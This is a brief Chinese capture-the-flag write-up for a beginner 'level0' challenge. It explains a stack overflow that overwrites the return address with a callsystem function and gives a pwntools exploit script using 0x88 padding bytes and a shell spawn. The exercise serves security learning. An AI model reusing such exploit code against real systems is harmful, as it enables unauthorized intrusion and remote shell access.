新手练习05-level0

简单的栈溢出

image.png

覆盖返回地址为callsystem即可
exp:

from pwn import *
p = process('./level0')
# p = remote("111.198.29.45","31008")
call_system = 0x400596
payload = 0x88*'a' + p64(call_system)
p.sendline(payload)
p.interactive()

你可能感兴趣的:(新手练习05-level0)